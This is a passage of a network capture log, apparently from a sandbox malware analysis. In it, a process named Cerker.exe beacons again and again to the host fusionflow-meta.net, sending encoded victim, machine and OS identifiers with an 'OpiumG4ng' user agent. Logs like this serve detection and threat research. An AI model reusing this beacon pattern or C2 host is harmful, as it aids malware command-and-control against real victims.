2024-08-31 20:43:54 UTC	692	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=01FWc8%2F%2Flwxe3LB834ewk1UKLdy68U1mShVokI%2BdxxoVN94QbkMEnFtWt5YN%2Bxv3%2BM9aH%2BzCtbHyKatuCzdvhb9nSZBoKvSrQjHzfLjexJ1dRr15QODkoTXwAfV9IzFdOJZdGWD7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdafebd5a7c6a-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:54 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49965	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:55 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:55 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nzXrV76ns3KuYHc%2FRebgJw6prdXmTrbPe5iUdRL%2BxviSB6OAktOq2e5H%2BJ4omZUCR7vgydx2gNZwdxY7P2YPgV8oHJzrgTwqSxooeSw4fDvQEzx22kg2AADUtTPSRSjNdyJ2zOn2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb073e7d8c7b-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:55 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49967	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:56 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:57 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CfYsx1wYJHtSWNpoYEuRfLr1bB4E6rrgxDA6BYGo5%2FA3DcADvUJwsI19JVWKs21oMSGEHXOjTDfpgBP3Gls2rKY4NeBB8qNAPTg8APIX0bUgsN7iEHGKPZnsBbsR%2F5Ap3KQMUkQt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb0f1eb50c92-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:57 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49970	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:58 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:58 UTC	682	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FuiQWOzQP2uQrnyakiqh0ucJQtTOJwUBDT09v7cJEduiGL26MlAG74ZjiFuqn2oiak2MXCd7nBr4EzH82H9FkwJ7wjlZtzkx1Uv9s14ebWKtyzsdDLmgluHRzR0qCtSC8GSswufq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb184d210f71-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:58 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49973	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:43:59 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:43:59 UTC	682	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:43:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YjWAnhdZWZOPWYfp%2FA9IhcWEI2MaoPnPrh0thAfrLhlUatDHBVLKPQNLkPEYiq5llFMP5tW6AX19I5BCwSPhraGhnxtRLAtaKshxwr3yEany6K20mRGoFDn9GX00F8wZd0FyOMvY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb20fac00f39-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:43:59 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:43:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49976	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:00 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:01 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FgWlti%2F7LOY5D6s09kWBdpTZUXnMCnUCaFaH01jLdpjEMeZXe7E0QBoBgqU8GlKIpmX4nAwPVp1JHnSfg9xGl6nZ%2FCsyJeu3OftMPdaGqCBpcjKmqbRLgzO5CIMdg1VULqsCwI3K"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb27cf695e6a-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:01 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49978	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:01 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:02 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R8iUM1IzyCiKiU0daFnc3y74oOWhSYhnkWT3perS1%2BL%2BEq%2Bulm73HU%2FU%2FOupsy1J2%2B1mlXXfPcE5hF3ZpWE88O3zJ8aUwjXGP7BnSn8q8Ie9AN5PbX252jK4v%2FnirDM5eMxCVUQK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb305a8118a1-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:02 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49981	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:03 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:03 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DRSpDVG3aGQ%2FcMEa7PdTm2xqIT93NUbgRx2jtr2rViq%2BYYN3jRxBAyuWwgruBM3NbKuSnGCReEp1W9yc0rWJtDYWBsHu42nQtDpd0ti8cIbOBCjGEzmqt6OsEhHG3wy2Q9RU6mLD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb396c9d43d0-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:03 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49983	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:04 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:05 UTC	686	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zx2Vac9XBZNmkQp%2BxqB%2BOUtBPVEPA9MSfBj3xZxG80ukzsWG%2FMTbCTfrX26OLVBqAdVd1PLaWbAwx22aooZlUtPZ1Zj24IYWXNI3Z95Odi64sttrlURyNw9GXzrLNDQey4RdfsOy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb405b29c328-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:05 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49986	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:05 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:06 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=amVYkq4ZiHIj7tPdnlVQam5Sk%2FPRDJKIyVZwfAizXk80heVsIUVbsbR6mxnN8RwqzxRScHr0Qjn61xLtYQ63oqzxqUqoL6%2FUybVfnjdzU9j%2BBCMOgws%2BylAA%2F5QIYzmNNPs7kW9n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb4979201a0f-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:06 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49989	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:07 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:07 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2FAftiXYxQYDCZiKhJq3lnYunEG67O5u7yz64RVoF2axxiMR8xyS2MdNxPTh2hXhqJq1OOKhGBfjCl8CX6xNettFimtxMiBSyvll6Ah%2BDd0ihkZYxpBUr1V74tUF5DLQrwctbn7v"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb513c1d8c8f-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:07 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49992	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:08 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:09 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKpc5aOy8sQHf%2FZOhQ25SaIumTn2L%2F0ZAXJUi%2FWO5e85ZO%2BlYWwcCLbDskr7anqZQTCbZAkzCPagH4M65kZyP5WsqbxHCke1POh1gohdDZ1OGJ7tqdLTjIK581AGHIxDSpitdEeK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb59df7d4239-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:09 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49994	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:09 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:10 UTC	690	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpwFbzgu%2F9pjNal5yRigqEkvaoaU7aNCe0wAvL%2Bzki9Vgn46kiPCF6etixWP8JHudGDYuocH6ye1D4mnSLuZ%2BYEwC%2F1hVqj4ECf1pXKdznz4WKGmNn0j5%2BZ6t1MqeIyvRWimQY2x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb620aa9424c-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:10 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49997	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:11 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:11 UTC	688	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EvEPfkdEPaDG%2BBGTF1v3nsq4bb3ACL0rUO3BjT4eaovYc7QS9VfQeiamBQWD9qutSxZOr4ugrN096OiUd%2Fef1rRxco3vL7ICNKnos53sD%2F0ic%2BHipas3FdKHyQZXUzyWTML4mXBn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb6aff58c346-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:11 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49999	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:12 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:13 UTC	696	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WzchqW9jihH7jYaUtcjbno7yS7Spw2Cynsu%2F3PGS%2BdCnWi3JPxzFII%2F0pB25wLYOifVGkRBdrwMUV6R3D4it%2B3F4oF5vnI1T0K5bvfnO%2FT%2BW8zeIKNJtrqt9uBq%2FnHoD%2FlTo356h"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb731e738c7b-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:13 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	50003	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 20:44:13 UTC	351	OUT	GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: fusionflow-meta.net Cache-Control: no-cache Cookie: PHPSESSID=4kmarlr4hm8v94p2gnjr7gusdp
2024-08-31 20:44:14 UTC	684	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:44:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e5DnUyc2B7fWHGHILDoyjOqmij%2FsOZ%2Fh6GJMaYNIqcyTvo20vHGyWaRkQFIPKPUIjVUQno5tfYsE8yohNsH70pNoyd0ag9BT9i5xiOUB3slmBu5eGXC4EdDmiRVyWPOuX5HppJgS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbfdb7a7b44424d-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 20:44:14 UTC	7	IN	Data Raw: 32 0d 0a 4f 4b 0d 0a Data Ascii: 2OK
2024-08-31 20:44:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	50005	188.114.96.3	443	7020	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
